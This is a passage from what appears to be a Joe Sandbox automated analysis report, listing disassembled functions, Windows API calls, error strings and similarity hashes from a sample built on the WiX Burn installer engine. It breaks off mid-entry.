                                                                                                                                                                  Function 009739DD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0092CE21,?,00000000,00000000,00000000,00000000), ref: 009739F5
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0092CE21,?,00000000,00000000,00000000,00000000), ref: 009739FF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                  • String ID: Failed to set file pointer.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                  • API String ID: 2976181284-4026511950
                                                                                                                                                                  • Opcode ID: 4ea2e9f83b517334b760834949baff63ef1c77bd2693df68e16be32cec445267
                                                                                                                                                                  • Instruction ID: 325ebb65707c678f632ff00d99dfb04558db919e0fbf3aedc069ce37a10ff948
                                                                                                                                                                  • Opcode Fuzzy Hash: 4ea2e9f83b517334b760834949baff63ef1c77bd2693df68e16be32cec445267
                                                                                                                                                                  • Instruction Fuzzy Hash: CB01B573600229BBDB248F44DC46EAF7AACDF85764F018029FD49AB250E270CE10E6F0
                                                                                                                                                                  Function 0093EB41 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,0093E01F,?,?,?), ref: 0093EB69
                                                                                                                                                                  • GetLastError.KERNEL32(?,0093E01F,?,?,?), ref: 0093EB73
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                  • String ID: Failed to move to virtual file pointer.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                  • API String ID: 2976181284-2079782632
                                                                                                                                                                  • Opcode ID: 0207777d14e170630cb4062ee85f6a11e4dc1f8db66960dae26b795667d4c3bd
                                                                                                                                                                  • Instruction ID: 353969beefb94dba63904829e30e15e47807be976a5ef593a71595a5c59b2f19
                                                                                                                                                                  • Opcode Fuzzy Hash: 0207777d14e170630cb4062ee85f6a11e4dc1f8db66960dae26b795667d4c3bd
                                                                                                                                                                  • Instruction Fuzzy Hash: D701F57764023A77D72246568C09FABFE6CEF417B0F018125FE18A6290D6359C209AD0
                                                                                                                                                                  Function 00911121 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000), ref: 00911136
                                                                                                                                                                    • Part of subcall function 009179D1: lstrlenW.KERNEL32(burn.clean.room,?,?,?,00911144,?,?,00000000), ref: 009179EF
                                                                                                                                                                    • Part of subcall function 009179D1: CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,00911144,?,?,00000000), ref: 00917A1F
                                                                                                                                                                    • Part of subcall function 00911651: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,0091114D), ref: 00911658
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?), ref: 00911191
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to run application., xrefs: 0091116F
                                                                                                                                                                  • D:\a\wix4\wix4\src\burn\stub\stub.cpp, xrefs: 0091117E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCompareCreateFileHandleHeapInformationStringlstrlen
                                                                                                                                                                  • String ID: D:\a\wix4\wix4\src\burn\stub\stub.cpp$Failed to run application.
                                                                                                                                                                  • API String ID: 4127744429-3638059706
                                                                                                                                                                  • Opcode ID: dbf5735372ff2a7fb21315a6c3f4d70b355115dbdf0d541c5affe468b9b57314
                                                                                                                                                                  • Instruction ID: 4108bfe22e21a3bf7791fe2d853dec5f09fd89104f4af95c53c1e178ea9c2f38
                                                                                                                                                                  • Opcode Fuzzy Hash: dbf5735372ff2a7fb21315a6c3f4d70b355115dbdf0d541c5affe468b9b57314
                                                                                                                                                                  • Instruction Fuzzy Hash: 61014733B4532C76EB226A64EC0AFEEBA389F85B20F104110FB00762C0D7A08884C6A5
                                                                                                                                                                  Function 00929FD1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000000,00000000,00000002,00000002,?,0092A612,00000008,?), ref: 0092A072
                                                                                                                                                                  Strings
                                                                                                                                                                  • Logging, xrefs: 00929FFF
                                                                                                                                                                  • SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 00929FE8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer
                                                                                                                                                                  • API String ID: 3535843008-387823766
                                                                                                                                                                  • Opcode ID: 5d62015ea17353dca7ad02193ac742d6647e2bed5cbf70220fc06b4644fc4a00
                                                                                                                                                                  • Instruction ID: 51065f405c5ec22d8c9f4efccac7a1068af2af8ad6e53a9daee353122d7fd2be
                                                                                                                                                                  • Opcode Fuzzy Hash: 5d62015ea17353dca7ad02193ac742d6647e2bed5cbf70220fc06b4644fc4a00
                                                                                                                                                                  • Instruction Fuzzy Hash: 471157376C0229BBEB34AA50EC42BFA776CBB06B51F900055F941A7198C7749E85C752
                                                                                                                                                                  Function 0096CBC2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(?,0096CBBE,00000000,00000000,00000003,00000000,?,?,00976603,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 0096CBED
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 0096CC1C, 0096CC22, 0096CC39
                                                                                                                                                                  • Failed to open registry key, root: %x, subkey: %ls., xrefs: 0096CC2E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Open
                                                                                                                                                                  • String ID: Failed to open registry key, root: %x, subkey: %ls.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                  • API String ID: 71445658-2584571730
                                                                                                                                                                  • Opcode ID: b530a227459d43061cd1a241bd88377890abf54b6ec2c42445d6d64795a5946d
                                                                                                                                                                  • Instruction ID: 75c735c4cddd7d14b3ca4d4dec7725cd633c6961e09603c654cd93540f5b21d8
                                                                                                                                                                  • Opcode Fuzzy Hash: b530a227459d43061cd1a241bd88377890abf54b6ec2c42445d6d64795a5946d
                                                                                                                                                                  • Instruction Fuzzy Hash: DC01F9F720051977EB211A168C05FBB3E5EDBC53A0F154824FE99DB250D6398C5196F4
                                                                                                                                                                  Function 00917BE6 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009180F4
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917B31
                                                                                                                                                                  • Failed to initialize Cryputil., xrefs: 00917BE6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Uninitialize
                                                                                                                                                                  • String ID: Failed to initialize Cryputil.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 3861434553-397782128
                                                                                                                                                                  • Opcode ID: 77aeaab56ca659c62fd50103bd5388cef23f725d94ff10d65bfc5d70c63ba839
                                                                                                                                                                  • Instruction ID: 5812649f80eb395569212f642631c9b5e45acdceedc7e151553604962c0ee0d9
                                                                                                                                                                  • Opcode Fuzzy Hash: 77aeaab56ca659c62fd50103bd5388cef23f725d94ff10d65bfc5d70c63ba839
                                                                                                                                                                  • Instruction Fuzzy Hash: 67418331A0922D97EF30B7A0CC06BEEB2B8AB40305F1844E6B54962192DF744DC9DF92
                                                                                                                                                                  Function 00917B61 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009180F4
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917B31
                                                                                                                                                                  • Failed to initialize engine state., xrefs: 00917B61
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Uninitialize
                                                                                                                                                                  • String ID: Failed to initialize engine state.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 3861434553-3105230827
                                                                                                                                                                  • Opcode ID: ec188a07dc0730cc4699cb38601308a3408d05e05c601b26944af4ca6efaca03
                                                                                                                                                                  • Instruction ID: fe6411cc6c97a0a9244a253176340c44dca75c5791fd20e6653708a1ed0bcc82
                                                                                                                                                                  • Opcode Fuzzy Hash: ec188a07dc0730cc4699cb38601308a3408d05e05c601b26944af4ca6efaca03
                                                                                                                                                                  • Instruction Fuzzy Hash: A8416331A0922D97EF30B7A0DC06BEEB2B8BB40305F1845E6B54962192DF745DC9DF92
                                                                                                                                                                  Function 00917C13 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009180F4
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917B31
                                                                                                                                                                  • Failed to initialize Regutil., xrefs: 00917C13
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Uninitialize
                                                                                                                                                                  • String ID: Failed to initialize Regutil.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 3861434553-4164290783
                                                                                                                                                                  • Opcode ID: 571d8c48e3e2e499b1d4b280e7f5cde1d0623e58e3f143cc9672d9abf64995c7
                                                                                                                                                                  • Instruction ID: c664da0e4b22644950d66dbf374fca482a08a1ad73041650196d61e79e822404
                                                                                                                                                                  • Opcode Fuzzy Hash: 571d8c48e3e2e499b1d4b280e7f5cde1d0623e58e3f143cc9672d9abf64995c7
                                                                                                                                                                  • Instruction Fuzzy Hash: D7416231A0922D97EF30B6A0DC06BEEB2B8AB40305F1845E6B54962192DF745DC9DF92
                                                                                                                                                                  Function 00917B1F Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 114COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009180F4
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917B31
                                                                                                                                                                  • Failed to parse command line., xrefs: 00917B1F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Uninitialize
                                                                                                                                                                  • String ID: Failed to parse command line.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 3861434553-3869882359
                                                                                                                                                                  • Opcode ID: 75e1c6a0cf33cc62822719a9683d5d9338441e226313940bd366f129b58e71c2
                                                                                                                                                                  • Instruction ID: 879591f5f45cb8b1e32fd1f5021a904b170b2786579a0894d39471c941df9609
                                                                                                                                                                  • Opcode Fuzzy Hash: 75e1c6a0cf33cc62822719a9683d5d9338441e226313940bd366f129b58e71c2
                                                                                                                                                                  • Instruction Fuzzy Hash: A1416231A0522D97EF30B7A0CC06BEEB2B8BB40305F1845E6B54962192DF745EC9DF92
                                                                                                                                                                  Function 009155C9 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,0093DE2B,?), ref: 009155D3
                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,?,?,0093DE2B,?), ref: 009155DA
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0093DE2B,?), ref: 009155E4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$ErrorFreeLastProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 406640338-0
                                                                                                                                                                  • Opcode ID: 66ae72087e492ad9a141d74c83093b17841ea56e8ac9974d180715477e7b2e89
                                                                                                                                                                  • Instruction ID: 0651fa0e3dcdc07cfeb3a63911cfca84fb54b787d4ba9e9718080b7c35625b0e
                                                                                                                                                                  • Opcode Fuzzy Hash: 66ae72087e492ad9a141d74c83093b17841ea56e8ac9974d180715477e7b2e89
                                                                                                                                                                  • Instruction Fuzzy Hash: 13D0C273A05A39A3832017EAAC0898BBE7DEF086A17034162FD08DB121C631CC80A2E0
                                                                                                                                                                  Function 0095E644 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(0095E74E,?,0095E63E,00000000,?,?,0095E74E,A68EAB5A,?,0095E74E), ref: 0095E655
                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,0095E63E,00000000,?,?,0095E74E,A68EAB5A,?,0095E74E), ref: 0095E65C
                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0095E66E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                  • Opcode ID: 1181823365b1214f2df3fc4bc6be3cf9f14de1b44529caabad2e6bc801f5498d
                                                                                                                                                                  • Instruction ID: c33d9ce6eeff2f73fd9e71115f5e8cd14017b4bd0ae50d218209104c7aa45bf4
                                                                                                                                                                  • Opcode Fuzzy Hash: 1181823365b1214f2df3fc4bc6be3cf9f14de1b44529caabad2e6bc801f5498d
                                                                                                                                                                  • Instruction Fuzzy Hash: 75D09E32019108BFDF056F61DC0E9593F2AEF543867804050BD594A171DF329E95EB94
                                                                                                                                                                  Function 00917E72 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009180F4
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to run per-user mode., xrefs: 00917E78
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Uninitialize
                                                                                                                                                                  • String ID: Failed to run per-user mode.
                                                                                                                                                                  • API String ID: 3861434553-1208236218
                                                                                                                                                                  • Opcode ID: 9ac61be5a7e8b3ae4a1a77b2e1f620ce84694dc5921d1fecc697854f53472a7d
                                                                                                                                                                  • Instruction ID: 51ed4b891a65e560f077a060771c81e1e20962e8e835bb5314d32fc15a65848b
                                                                                                                                                                  • Opcode Fuzzy Hash: 9ac61be5a7e8b3ae4a1a77b2e1f620ce84694dc5921d1fecc697854f53472a7d
                                                                                                                                                                  • Instruction Fuzzy Hash: 7D415331A0522D97EB30B6A0CC06BEEB3B8AB44305F1845E6A54962192DF749DC9DF91
                                                                                                                                                                  Function 009156C2 Relevance: 3.0, APIs: 2, Instructions: 14memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,00000000,?,?,009154FB,00000000,00000000,00000001,00000000,00000000,?,00000000,?,?,00000000,?), ref: 009156D6
                                                                                                                                                                  • RtlReAllocateHeap.NTDLL(00000000,?,009154FB,00000000,00000000,00000001,00000000,00000000,?,00000000,?,?,00000000,?,?,00000000), ref: 009156DD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocateProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1357844191-0
                                                                                                                                                                  • Opcode ID: 321b2b5c5eeea877d3ae47a07c95cffa47aaa0be3d8c7f62b6a560459f379018
                                                                                                                                                                  • Instruction ID: abaf22a9485e66bd378c99642967eb6be6a39946bbceaf7f6314afd0fa249e0b
                                                                                                                                                                  • Opcode Fuzzy Hash: 321b2b5c5eeea877d3ae47a07c95cffa47aaa0be3d8c7f62b6a560459f379018
                                                                                                                                                                  • Instruction Fuzzy Hash: 99D0123316824DEBDF005FE8DC09DEE3BACEB5C6127008655F929C6121CA39E4A0EB60
                                                                                                                                                                  Function 0096B3F2 Relevance: 2.5, APIs: 2, Instructions: 17COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
